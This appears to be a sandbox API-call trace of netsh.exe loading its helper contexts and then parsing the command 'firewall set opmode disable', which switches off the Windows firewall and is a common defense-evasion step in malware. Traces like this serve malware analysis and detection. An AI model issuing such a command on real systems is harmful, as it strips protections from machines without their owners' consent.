[0120.869] _wcsicmp (_String1="wfp", _String2="firewall") returned 17 [0120.869] _wcsicmp (_String1="wfp", _String2="http") returned 15 [0120.869] _wcsicmp (_String1="wfp", _String2="interface") returned 14 [0120.869] _wcsicmp (_String1="wfp", _String2="ipsec") returned 14 [0120.869] _wcsicmp (_String1="wfp", _String2="lan") returned 11 [0120.869] _wcsicmp (_String1="wfp", _String2="namespace") returned 9 [0120.869] _wcsicmp (_String1="wfp", _String2="netio") returned 9 [0120.870] _wcsicmp (_String1="wfp", _String2="ras") returned 5 [0120.870] GetProcessHeap () returned 0xc50000 [0120.870] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x3a8) returned 0xc78e38 [0120.870] GetProcessHeap () returned 0xc50000 [0120.870] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc85158) returned 1 [0120.872] RegisterContext () returned 0x0 [0120.872] _wcsicmp (_String1="p2p", _String2="advfirewall") returned 15 [0120.872] _wcsicmp (_String1="p2p", _String2="bridge") returned 14 [0120.872] _wcsicmp (_String1="p2p", _String2="dhcpclient") returned 12 [0120.872] _wcsicmp (_String1="p2p", _String2="dnsclient") returned 12 [0120.872] _wcsicmp (_String1="p2p", _String2="firewall") returned 10 [0120.872] _wcsicmp (_String1="p2p", _String2="http") returned 8 [0120.872] _wcsicmp (_String1="p2p", _String2="interface") returned 7 [0120.872] _wcsicmp (_String1="p2p", _String2="ipsec") returned 7 [0120.872] _wcsicmp (_String1="p2p", _String2="lan") returned 4 [0120.872] _wcsicmp (_String1="p2p", _String2="namespace") returned 2 [0120.872] _wcsicmp (_String1="p2p", _String2="netio") returned 2 [0120.872] _wcsicmp (_String1="p2p", _String2="ras") returned -2 [0120.872] _wcsicmp (_String1="p2p", _String2="wfp") returned -7 [0120.872] _wcsicmp (_String1="p2p", _String2="advfirewall") returned 15 [0120.872] _wcsicmp (_String1="p2p", _String2="bridge") returned 14 [0120.872] _wcsicmp (_String1="p2p", _String2="dhcpclient") returned 12 [0120.872] _wcsicmp (_String1="p2p", _String2="dnsclient") returned 12 [0120.872] _wcsicmp (_String1="p2p", _String2="firewall") returned 10 [0120.872] _wcsicmp (_String1="p2p", _String2="http") returned 8 [0120.872] _wcsicmp (_String1="p2p", _String2="interface") returned 7 [0120.872] _wcsicmp (_String1="p2p", _String2="ipsec") returned 7 [0120.872] _wcsicmp (_String1="p2p", _String2="lan") returned 4 [0120.872] _wcsicmp (_String1="p2p", _String2="namespace") returned 2 [0120.872] _wcsicmp (_String1="p2p", _String2="netio") returned 2 [0120.872] _wcsicmp (_String1="p2p", _String2="ras") returned -2 [0120.872] GetProcessHeap () returned 0xc50000 [0120.872] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x3f0) returned 0xc87160 [0120.872] GetProcessHeap () returned 0xc50000 [0120.873] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc78e38) returned 1 [0120.873] RegisterContext () returned 0x0 [0120.873] GetProcessHeap () returned 0xc50000 [0120.873] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x48) returned 0xc670a8 [0120.873] GetProcessHeap () returned 0xc50000 [0120.873] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0x0) returned 1 [0120.877] RegisterContext () returned 0x0 [0120.877] _wcsicmp (_String1="group", _String2="pnrp") returned -9 [0120.877] _wcsicmp (_String1="group", _String2="pnrp") returned -9 [0120.877] GetProcessHeap () returned 0xc50000 [0120.877] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x90) returned 0xc78710 [0120.877] GetProcessHeap () returned 0xc50000 [0120.877] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc670a8) returned 1 [0120.878] RegisterContext () returned 0x0 [0120.878] _wcsicmp (_String1="idmgr", _String2="group") returned 2 [0120.878] _wcsicmp (_String1="idmgr", _String2="pnrp") returned -7 [0120.878] _wcsicmp (_String1="idmgr", _String2="group") returned 2 [0120.878] _wcsicmp (_String1="idmgr", _String2="pnrp") returned -7 [0120.878] GetProcessHeap () returned 0xc50000 [0120.878] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xd8) returned 0xc7cd90 [0120.878] GetProcessHeap () returned 0xc50000 [0120.878] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc78710) returned 1 [0120.878] RegisterContext () returned 0x0 [0120.878] GetProcessHeap () returned 0xc50000 [0120.878] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x48) returned 0xc670a8 [0120.878] GetProcessHeap () returned 0xc50000 [0120.878] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0x0) returned 1 [0120.878] RegisterContext () returned 0x0 [0120.878] _wcsicmp (_String1="diagnostics", _String2="cloud") returned 1 [0120.878] _wcsicmp (_String1="diagnostics", _String2="cloud") returned 1 [0120.878] GetProcessHeap () returned 0xc50000 [0120.878] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x90) returned 0xc78710 [0120.878] GetProcessHeap () returned 0xc50000 [0120.878] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc670a8) returned 1 [0120.878] RegisterContext () returned 0x0 [0120.878] _wcsicmp (_String1="peer", _String2="cloud") returned 13 [0120.878] _wcsicmp (_String1="peer", _String2="diagnostics") returned 12 [0120.878] _wcsicmp (_String1="peer", _String2="cloud") returned 13 [0120.879] _wcsicmp (_String1="peer", _String2="diagnostics") returned 12 [0120.879] GetProcessHeap () returned 0xc50000 [0120.879] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xd8) returned 0xc78a90 [0120.879] GetProcessHeap () returned 0xc50000 [0120.879] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc78710) returned 1 [0120.879] RegisterContext () returned 0x0 [0120.879] GetProcessHeap () returned 0xc50000 [0120.879] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x48) returned 0xc670a8 [0120.879] GetProcessHeap () returned 0xc50000 [0120.879] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0x0) returned 1 [0120.879] RegisterContext () returned 0x0 [0120.879] _wcsicmp (_String1="rpc", _String2="advfirewall") returned 17 [0120.879] _wcsicmp (_String1="rpc", _String2="bridge") returned 16 [0120.879] _wcsicmp (_String1="rpc", _String2="dhcpclient") returned 14 [0120.879] _wcsicmp (_String1="rpc", _String2="dnsclient") returned 14 [0120.879] _wcsicmp (_String1="rpc", _String2="firewall") returned 12 [0120.879] _wcsicmp (_String1="rpc", _String2="http") returned 10 [0120.879] _wcsicmp (_String1="rpc", _String2="interface") returned 9 [0120.879] _wcsicmp (_String1="rpc", _String2="ipsec") returned 9 [0120.879] _wcsicmp (_String1="rpc", _String2="lan") returned 6 [0120.879] _wcsicmp (_String1="rpc", _String2="namespace") returned 4 [0120.879] _wcsicmp (_String1="rpc", _String2="netio") returned 4 [0120.879] _wcsicmp (_String1="rpc", _String2="p2p") returned 2 [0120.879] _wcsicmp (_String1="rpc", _String2="ras") returned 15 [0120.879] _wcsicmp (_String1="rpc", _String2="wfp") returned -5 [0120.879] _wcsicmp (_String1="rpc", _String2="advfirewall") returned 17 [0120.879] _wcsicmp (_String1="rpc", _String2="bridge") returned 16 [0120.879] _wcsicmp (_String1="rpc", _String2="dhcpclient") returned 14 [0120.879] _wcsicmp (_String1="rpc", _String2="dnsclient") returned 14 [0120.880] _wcsicmp (_String1="rpc", _String2="firewall") returned 12 [0120.880] _wcsicmp (_String1="rpc", _String2="http") returned 10 [0120.880] _wcsicmp (_String1="rpc", _String2="interface") returned 9 [0120.880] _wcsicmp (_String1="rpc", _String2="ipsec") returned 9 [0120.880] _wcsicmp (_String1="rpc", _String2="lan") returned 6 [0120.880] _wcsicmp (_String1="rpc", _String2="namespace") returned 4 [0120.880] _wcsicmp (_String1="rpc", _String2="netio") returned 4 [0120.880] _wcsicmp (_String1="rpc", _String2="p2p") returned 2 [0120.880] _wcsicmp (_String1="rpc", _String2="ras") returned 15 [0120.880] _wcsicmp (_String1="rpc", _String2="wfp") returned -5 [0120.880] GetProcessHeap () returned 0xc50000 [0120.880] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x438) returned 0xc78e38 [0120.880] GetProcessHeap () returned 0xc50000 [0120.880] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc87160) returned 1 [0120.880] RegisterContext () returned 0x0 [0120.880] GetProcessHeap () returned 0xc50000 [0120.880] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x48) returned 0xc87960 [0120.880] GetProcessHeap () returned 0xc50000 [0120.880] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0x0) returned 1 [0120.880] RegisterContext () returned 0x0 [0120.880] _wcsicmp (_String1="winhttp", _String2="advfirewall") returned 22 [0120.880] _wcsicmp (_String1="winhttp", _String2="bridge") returned 21 [0120.880] _wcsicmp (_String1="winhttp", _String2="dhcpclient") returned 19 [0120.880] _wcsicmp (_String1="winhttp", _String2="dnsclient") returned 19 [0120.880] _wcsicmp (_String1="winhttp", _String2="firewall") returned 17 [0120.880] _wcsicmp (_String1="winhttp", _String2="http") returned 15 [0120.880] _wcsicmp (_String1="winhttp", _String2="interface") returned 14 [0120.880] _wcsicmp (_String1="winhttp", _String2="ipsec") returned 14 [0120.880] _wcsicmp (_String1="winhttp", _String2="lan") returned 11 [0120.881] _wcsicmp (_String1="winhttp", _String2="namespace") returned 9 [0120.881] _wcsicmp (_String1="winhttp", _String2="netio") returned 9 [0120.881] _wcsicmp (_String1="winhttp", _String2="p2p") returned 7 [0120.881] _wcsicmp (_String1="winhttp", _String2="ras") returned 5 [0120.881] _wcsicmp (_String1="winhttp", _String2="rpc") returned 5 [0120.881] _wcsicmp (_String1="winhttp", _String2="wfp") returned 3 [0120.881] _wcsicmp (_String1="winhttp", _String2="advfirewall") returned 22 [0120.881] _wcsicmp (_String1="winhttp", _String2="bridge") returned 21 [0120.881] _wcsicmp (_String1="winhttp", _String2="dhcpclient") returned 19 [0120.881] _wcsicmp (_String1="winhttp", _String2="dnsclient") returned 19 [0120.881] _wcsicmp (_String1="winhttp", _String2="firewall") returned 17 [0120.881] _wcsicmp (_String1="winhttp", _String2="http") returned 15 [0120.881] _wcsicmp (_String1="winhttp", _String2="interface") returned 14 [0120.881] _wcsicmp (_String1="winhttp", _String2="ipsec") returned 14 [0120.881] _wcsicmp (_String1="winhttp", _String2="lan") returned 11 [0120.881] _wcsicmp (_String1="winhttp", _String2="namespace") returned 9 [0120.881] _wcsicmp (_String1="winhttp", _String2="netio") returned 9 [0120.881] _wcsicmp (_String1="winhttp", _String2="p2p") returned 7 [0120.881] _wcsicmp (_String1="winhttp", _String2="ras") returned 5 [0120.881] _wcsicmp (_String1="winhttp", _String2="rpc") returned 5 [0120.881] _wcsicmp (_String1="winhttp", _String2="wfp") returned 3 [0120.881] GetProcessHeap () returned 0xc50000 [0120.881] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x480) returned 0xc88168 [0120.881] GetProcessHeap () returned 0xc50000 [0120.881] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc78e38) returned 1 [0120.997] RegisterContext () returned 0x0 [0120.997] _wcsicmp (_String1="wlan", _String2="advfirewall") returned 22 [0120.997] _wcsicmp (_String1="wlan", _String2="bridge") returned 21 [0120.997] _wcsicmp (_String1="wlan", _String2="dhcpclient") returned 19 [0120.997] _wcsicmp (_String1="wlan", _String2="dnsclient") returned 19 [0120.997] _wcsicmp (_String1="wlan", _String2="firewall") returned 17 [0120.997] _wcsicmp (_String1="wlan", _String2="http") returned 15 [0120.997] _wcsicmp (_String1="wlan", _String2="interface") returned 14 [0120.997] _wcsicmp (_String1="wlan", _String2="ipsec") returned 14 [0120.997] _wcsicmp (_String1="wlan", _String2="lan") returned 11 [0120.997] _wcsicmp (_String1="wlan", _String2="namespace") returned 9 [0120.997] _wcsicmp (_String1="wlan", _String2="netio") returned 9 [0120.997] _wcsicmp (_String1="wlan", _String2="p2p") returned 7 [0120.997] _wcsicmp (_String1="wlan", _String2="ras") returned 5 [0120.998] _wcsicmp (_String1="wlan", _String2="rpc") returned 5 [0120.998] _wcsicmp (_String1="wlan", _String2="wfp") returned 6 [0120.998] _wcsicmp (_String1="wlan", _String2="winhttp") returned 3 [0120.998] _wcsicmp (_String1="wlan", _String2="advfirewall") returned 22 [0120.998] _wcsicmp (_String1="wlan", _String2="bridge") returned 21 [0120.998] _wcsicmp (_String1="wlan", _String2="dhcpclient") returned 19 [0120.998] _wcsicmp (_String1="wlan", _String2="dnsclient") returned 19 [0120.998] _wcsicmp (_String1="wlan", _String2="firewall") returned 17 [0120.998] _wcsicmp (_String1="wlan", _String2="http") returned 15 [0120.998] _wcsicmp (_String1="wlan", _String2="interface") returned 14 [0120.998] _wcsicmp (_String1="wlan", _String2="ipsec") returned 14 [0120.998] _wcsicmp (_String1="wlan", _String2="lan") returned 11 [0120.998] _wcsicmp (_String1="wlan", _String2="namespace") returned 9 [0120.998] _wcsicmp (_String1="wlan", _String2="netio") returned 9 [0120.998] _wcsicmp (_String1="wlan", _String2="p2p") returned 7 [0120.998] _wcsicmp (_String1="wlan", _String2="ras") returned 5 [0120.998] _wcsicmp (_String1="wlan", _String2="rpc") returned 5 [0120.998] _wcsicmp (_String1="wlan", _String2="wfp") returned 6 [0120.998] _wcsicmp (_String1="wlan", _String2="winhttp") returned 3 [0120.998] GetProcessHeap () returned 0xc50000 [0120.998] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x4c8) returned 0xc88878 [0120.998] GetProcessHeap () returned 0xc50000 [0120.999] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc88168) returned 1 [0120.999] RegisterContext () returned 0x0 [0120.999] _wcsicmp (_String1="winsock", _String2="advfirewall") returned 22 [0120.999] _wcsicmp (_String1="winsock", _String2="bridge") returned 21 [0120.999] _wcsicmp (_String1="winsock", _String2="dhcpclient") returned 19 [0120.999] _wcsicmp (_String1="winsock", _String2="dnsclient") returned 19 [0120.999] _wcsicmp (_String1="winsock", _String2="firewall") returned 17 [0120.999] _wcsicmp (_String1="winsock", _String2="http") returned 15 [0120.999] _wcsicmp (_String1="winsock", _String2="interface") returned 14 [0120.999] _wcsicmp (_String1="winsock", _String2="ipsec") returned 14 [0120.999] _wcsicmp (_String1="winsock", _String2="lan") returned 11 [0120.999] _wcsicmp (_String1="winsock", _String2="namespace") returned 9 [0120.999] _wcsicmp (_String1="winsock", _String2="netio") returned 9 [0120.999] _wcsicmp (_String1="winsock", _String2="p2p") returned 7 [0120.999] _wcsicmp (_String1="winsock", _String2="ras") returned 5 [0120.999] _wcsicmp (_String1="winsock", _String2="rpc") returned 5 [0120.999] _wcsicmp (_String1="winsock", _String2="wfp") returned 3 [0120.999] _wcsicmp (_String1="winsock", _String2="winhttp") returned 11 [0120.999] _wcsicmp (_String1="winsock", _String2="wlan") returned -3 [0120.999] _wcsicmp (_String1="winsock", _String2="advfirewall") returned 22 [0120.999] _wcsicmp (_String1="winsock", _String2="bridge") returned 21 [0120.999] _wcsicmp (_String1="winsock", _String2="dhcpclient") returned 19 [0120.999] _wcsicmp (_String1="winsock", _String2="dnsclient") returned 19 [0120.999] _wcsicmp (_String1="winsock", _String2="firewall") returned 17 [0120.999] _wcsicmp (_String1="winsock", _String2="http") returned 15 [0121.000] _wcsicmp (_String1="winsock", _String2="interface") returned 14 [0121.000] _wcsicmp (_String1="winsock", _String2="ipsec") returned 14 [0121.000] _wcsicmp (_String1="winsock", _String2="lan") returned 11 [0121.000] _wcsicmp (_String1="winsock", _String2="namespace") returned 9 [0121.000] _wcsicmp (_String1="winsock", _String2="netio") returned 9 [0121.000] _wcsicmp (_String1="winsock", _String2="p2p") returned 7 [0121.000] _wcsicmp (_String1="winsock", _String2="ras") returned 5 [0121.000] _wcsicmp (_String1="winsock", _String2="rpc") returned 5 [0121.000] _wcsicmp (_String1="winsock", _String2="wfp") returned 3 [0121.000] _wcsicmp (_String1="winsock", _String2="winhttp") returned 11 [0121.000] _wcsicmp (_String1="winsock", _String2="wlan") returned -3 [0121.000] GetProcessHeap () returned 0xc50000 [0121.000] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x510) returned 0xc88d48 [0121.000] GetProcessHeap () returned 0xc50000 [0121.000] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc88878) returned 1 [0121.630] RegisterContext () returned 0x0 [0121.630] _wcsicmp (_String1="branchcache", _String2="advfirewall") returned 1 [0121.630] _wcsicmp (_String1="branchcache", _String2="bridge") returned -8 [0121.630] _wcsicmp (_String1="branchcache", _String2="dhcpclient") returned -2 [0121.630] _wcsicmp (_String1="branchcache", _String2="dnsclient") returned -2 [0121.630] _wcsicmp (_String1="branchcache", _String2="firewall") returned -4 [0121.630] _wcsicmp (_String1="branchcache", _String2="http") returned -6 [0121.630] _wcsicmp (_String1="branchcache", _String2="interface") returned -7 [0121.630] _wcsicmp (_String1="branchcache", _String2="ipsec") returned -7 [0121.630] _wcsicmp (_String1="branchcache", _String2="lan") returned -10 [0121.630] _wcsicmp (_String1="branchcache", _String2="namespace") returned -12 [0121.630] _wcsicmp (_String1="branchcache", _String2="netio") returned -12 [0121.630] _wcsicmp (_String1="branchcache", _String2="p2p") returned -14 [0121.630] _wcsicmp (_String1="branchcache", _String2="ras") returned -16 [0121.630] _wcsicmp (_String1="branchcache", _String2="rpc") returned -16 [0121.630] _wcsicmp (_String1="branchcache", _String2="wfp") returned -21 [0121.631] _wcsicmp (_String1="branchcache", _String2="winhttp") returned -21 [0121.631] _wcsicmp (_String1="branchcache", _String2="winsock") returned -21 [0121.631] _wcsicmp (_String1="branchcache", _String2="wlan") returned -21 [0121.631] _wcsicmp (_String1="branchcache", _String2="advfirewall") returned 1 [0121.631] _wcsicmp (_String1="branchcache", _String2="bridge") returned -8 [0121.631] GetProcessHeap () returned 0xc50000 [0121.631] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x558) returned 0xc8a138 [0121.631] GetProcessHeap () returned 0xc50000 [0121.631] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc88d48) returned 1 [0121.631] RegisterContext () returned 0x0 [0121.631] GetProcessHeap () returned 0xc50000 [0121.631] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x48) returned 0xc87370 [0121.631] GetProcessHeap () returned 0xc50000 [0121.631] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0x0) returned 1 [0121.631] LoadLibraryExW (lpLibFileName="mprmsg.dll", hFile=0x0, dwFlags=0x800) returned 0x6be40000 [0121.950] GetProcAddress (hModule=0x6be40000, lpProcName="MprmsgGetErrorString") returned 0x6be41370 [0121.950] SetConsoleCtrlHandler (HandlerRoutine=0x15b8200, Add=1) returned 1 [0121.950] SetThreadUILanguage (LangId=0x0) returned 0x870409 [0122.133] _wcsicmp (_String1="firewall", _String2="-?") returned 57 [0122.133] _wcsicmp (_String1="firewall", _String2="-h") returned 57 [0122.133] _wcsicmp (_String1="firewall", _String2="?") returned 39 [0122.133] _wcsicmp (_String1="firewall", _String2="/?") returned 55 [0122.133] _wcsicmp (_String1="firewall", _String2="-v") returned 57 [0122.133] _wcsicmp (_String1="firewall", _String2="-a") returned 57 [0122.133] _wcsicmp (_String1="firewall", _String2="-c") returned 57 [0122.133] _wcsicmp (_String1="firewall", _String2="-f") returned 57 [0122.133] _wcsicmp (_String1="firewall", _String2="-r") returned 57 [0122.133] _wcsicmp (_String1="firewall", _String2="-u") returned 57 [0122.133] _wcsicmp (_String1="firewall", _String2="-p") returned 57 [0122.133] GetVersionExW (in: lpVersionInformation=0x7f78d8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x7f78d8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x3ad7, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0122.133] _vsnwprintf (in: _Buffer=0x15c3780, _BufferCount=0x103, _Format="%d.%d.%d", _ArgList=0x7f78c4 | out: _Buffer="10.0.15063") returned 10 [0122.133] _vsnwprintf (in: _Buffer=0x15c3990, _BufferCount=0x103, _Format="%d", _ArgList=0x7f78b4 | out: _Buffer="15063") returned 5 [0122.133] _vsnwprintf (in: _Buffer=0x15c3ba0, _BufferCount=0x103, _Format="%d", _ArgList=0x7f78a4 | out: _Buffer="0") returned 1 [0122.133] _vsnwprintf (in: _Buffer=0x15c3db0, _BufferCount=0x103, _Format="%d", _ArgList=0x7f7894 | out: _Buffer="0") returned 1 [0122.134] GetProcessHeap () returned 0xc50000 [0122.134] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc79168 [0122.134] GetProcessHeap () returned 0xc50000 [0122.134] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc8bca0 [0122.134] GetProcessHeap () returned 0xc50000 [0122.134] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc8bd48 [0122.134] GetProcessHeap () returned 0xc50000 [0122.134] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc8bc10 [0122.134] GetProcessHeap () returned 0xc50000 [0122.134] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc8bd90 [0122.134] wcscpy_s (in: _Destination=0xc8bd90, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0122.134] GetProcessHeap () returned 0xc50000 [0122.134] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8bd48) returned 1 [0122.134] GetProcessHeap () returned 0xc50000 [0122.134] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8bca0) returned 1 [0122.134] GetProcessHeap () returned 0xc50000 [0122.134] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc8bd00 [0122.134] GetProcessHeap () returned 0xc50000 [0122.134] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc8bbc8 [0122.134] GetProcessHeap () returned 0xc50000 [0122.134] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x38) returned 0xc765c8 [0122.134] GetProcessHeap () returned 0xc50000 [0122.134] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc8bbb0 [0122.134] GetProcessHeap () returned 0xc50000 [0122.134] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x12) returned 0xc7c488 [0122.134] wcscpy_s (in: _Destination=0xc7c488, _SizeInWords=0x9, _Source="firewall" | out: _Destination="firewall") returned 0x0 [0122.134] GetProcessHeap () returned 0xc50000 [0122.134] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc8bb98 [0122.134] GetProcessHeap () returned 0xc50000 [0122.134] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d938 [0122.134] wcscpy_s (in: _Destination=0xc5d938, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0122.134] GetProcessHeap () returned 0xc50000 [0122.134] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc8bcb8 [0122.135] GetProcessHeap () returned 0xc50000 [0122.135] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xe) returned 0xc8bc28 [0122.135] wcscpy_s (in: _Destination=0xc8bc28, _SizeInWords=0x7, _Source="opmode" | out: _Destination="opmode") returned 0x0 [0122.135] GetProcessHeap () returned 0xc50000 [0122.135] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc8bce8 [0122.135] GetProcessHeap () returned 0xc50000 [0122.135] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x10) returned 0xc8bbe0 [0122.135] wcscpy_s (in: _Destination=0xc8bbe0, _SizeInWords=0x8, _Source="disable" | out: _Destination="disable") returned 0x0 [0122.135] GetProcessHeap () returned 0xc50000 [0122.135] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc765c8) returned 1 [0122.135] GetProcessHeap () returned 0xc50000 [0122.135] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8bbc8) returned 1 [0122.135] GetProcessHeap () returned 0xc50000 [0122.135] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc8bbc8 [0122.135] GetProcessHeap () returned 0xc50000 [0122.135] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x12) returned 0xc7c4a8 [0122.135] wcscpy_s (in: _Destination=0xc7c4a8, _SizeInWords=0x9, _Source="firewall" | out: _Destination="firewall") returned 0x0 [0122.135] GetProcessHeap () returned 0xc50000 [0122.135] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc7c488) returned 1 [0122.135] GetProcessHeap () returned 0xc50000 [0122.135] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8bbb0) returned 1 [0122.135] GetProcessHeap () returned 0xc50000 [0122.135] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc8bb38 [0122.135] GetProcessHeap () returned 0xc50000 [0122.135] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x12) returned 0xc7c528 [0122.135] wcscpy_s (in: _Destination=0xc7c528, _SizeInWords=0x9, _Source="firewall" | out: _Destination="firewall") returned 0x0 [0122.135] GetProcessHeap () returned 0xc50000 [0122.135] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc7c4a8) returned 1 [0122.135] GetProcessHeap () returned 0xc50000 [0122.135] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8bbc8) returned 1 [0122.135] GetProcessHeap () returned 0xc50000 [0122.135] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc8bbb0 [0122.135] GetProcessHeap () returned 0xc50000 [0122.135] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc8c268 [0122.135] wcscpy_s (in: _Destination=0xc8c268, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0122.135] GetProcessHeap () returned 0xc50000 [0122.135] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d938) returned 1 [0122.136] GetProcessHeap () returned 0xc50000 [0122.136] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8bb98) returned 1 [0122.136] GetProcessHeap () returned 0xc50000 [0122.136] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc8bcd0 [0122.136] GetProcessHeap () returned 0xc50000 [0122.136] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xe) returned 0xc8bd18 [0122.136] wcscpy_s (in: _Destination=0xc8bd18, _SizeInWords=0x7, _Source="opmode" | out: _Destination="opmode") returned 0x0 [0122.136] GetProcessHeap () returned 0xc50000 [0122.136] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8bc28) returned 1 [0122.136] GetProcessHeap () returned 0xc50000 [0122.136] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8bcb8) returned 1 [0122.136] GetProcessHeap () returned 0xc50000 [0122.136] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc8bda8 [0122.136] GetProcessHeap () returned 0xc50000 [0122.136] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x10) returned 0xc8bdd8 [0122.136] wcscpy_s (in: _Destination=0xc8bdd8, _SizeInWords=0x8, _Source="disable" | out: _Destination="disable") returned 0x0 [0122.136] GetProcessHeap () returned 0xc50000 [0122.136] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8bbe0) returned 1 [0122.136] GetProcessHeap () returned 0xc50000 [0122.136] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc8bce8) returned 1 [0122.136] GetProcessHeap () returned 0xc50000 [0122.136] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x14) returned 0xc7c488 [0122.136] GetProcessHeap () returned 0xc50000 [0122.136] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc) returned 0xc8bd30 [0122.136] GetProcessHeap () returned 0xc50000 [0122.136] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x12) returned 0xc7c4a8 [0122.136] GetProcessHeap () returned 0xc50000 [0122.136] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc8c2d8 [0122.136] GetProcessHeap () returned 0xc50000 [0122.136] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xe) returned 0xc8bdc0 [0122.136] GetProcessHeap () returned 0xc50000 [0122.136] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x10) returned 0xc8bb98 